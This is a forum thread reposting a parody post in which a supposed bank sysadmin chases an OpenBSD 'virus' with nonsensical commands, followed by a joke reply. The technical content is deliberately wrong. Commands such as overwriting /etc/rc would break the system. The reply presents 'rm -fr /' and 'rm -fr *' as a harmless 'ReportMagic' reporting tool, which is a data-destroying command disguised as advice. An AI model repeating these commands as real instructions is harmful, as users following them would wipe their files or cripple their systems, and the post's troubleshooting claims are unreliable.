lewisje All American 9196 Posts user info edit post |
I am wondering if this is a new virus that I have found...
I was watching tcpdump today over lunch and I saw about a thousand outgoing connections. I didn't know what was causing it, but it was pretty funny to see. So I watched about 20 minutes while I mawed on my sandwich and then I noticed that the target IP's were all sequential! A quick search on Googles told me something was certainly amiss.
So when lunch hour was up, I decided to get to the bottom of this before the higher-ups here at the bank noticed that outbound browsing was impossible due to the saturated OC12. Good thing I don't have to worry about HIPA requirements today, 'eh? Haha!
First, I decided I needed to get to the root of the problem, no pun intended:
# fstat / | tcpdump -i - | less
Well, that doesn't work. It seems some newb committer removed the switch to allow tcpdump to read from stdin. Thanks a lot, buster!
With tcpdump not being useful at all with tracking down this networking problem, I knew I had to do something fast! The natives were getting wrestless as I saw the suited buzzards churning outside the NOC! So I locked the door and decided to start by removing all unneeded device drivers from my kernel. For the archives, a simple way of doing this is as follows:
# dmesg > /tmp/mygoodstuff # cat /usr/src/sys/`machine`/conf/GENERIC > /tmp/mybadstuff # diff /tmp/mygoodstuff /tmp/mybadstuff | uniq -v > \ /usr/src/sys/`machine`/NEWGENERIC
Then I compiled and installed the brand new kernel in an attempt to cure the problems of the day (or lunch hour lol).
After a quick smoke break, I rebooted the system with the new kernel. At this point, I decided to systrace the entire system. Again, for the archives, this is how one would do it (please add this to the FAQ, dudes, because I don't like having to repeat this every few days):
# echo "systrace /etc/rc" > /etc/rc
As time marched forward and after a quick reboot, I ran into a couple of snags in the armor! It seems that the virus may have taken its toll on the system which is a Soekris attached to a Sun D1000 drive array with a 3.2V PCI card (sorry guys I don't have the dmesg, but I can send one from Debian if that would help). Anyway, I tried to debug the system using the following command:
# systrace tcpdump -i /dev/systrace | cut -d' -f 3 | \ sed '/12/' | for a in `cat /dev/systrace`; do echo "$a" > /dev/console
This didn't seem to produce the desired results so now I am stuck in a poop boat with out a paddle, so to speak. Can anybody help?
P.S. I already have sent the output of "cat /dev/wd0c > /tmp/obsdvirus" to Symantec for them to analyze. That's what we pay them for!
P.P.S. Check out my blog in my sig!
-------- Mr. Billy B. Bilano, MSCE, CCNA
Expert Sysadmin Since 2003! 'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL' -- RMS http://monkey.org/openbsd/archive/misc/0406/msg00216.html 11/13/2010 1:22:05 PM |
llama All American 841 Posts user info edit post |
OpenBSD comes with an already integrated Standard Activation Wizard that does it all for you at the press of a button. Can it get easier? Its called "ReportMagic" or short "rm". There is an updated Version of it supplied with the ports collection, BUT do NOT use it! The Version in ports doesn't get the connection to the restartable system calls right and prints silly warnings. Thats why it is not integrated in the high quality default distribution. So it is much better to use the default Version integrated in OpenBSD. As arguments it you must supply which elements of a standard you want to break and the name of the standard. If you want to break all Elements of a Standard give the wildcard character * if you want only the top level elements of a standard give the standard root character / , bottom elements */ , elements between top and bottom /*/ and so on ...
Examples: rm -fr * POSIX1a rm -fr / ASN.1
the -fr Option gives u a nicely formatted _f_ull _r_eport. Unfortunately you must use this option otherwise it will do nothing because there is no sense in breaking a standard without reporting it, isn't it? 11/13/2010 11:04:10 PM |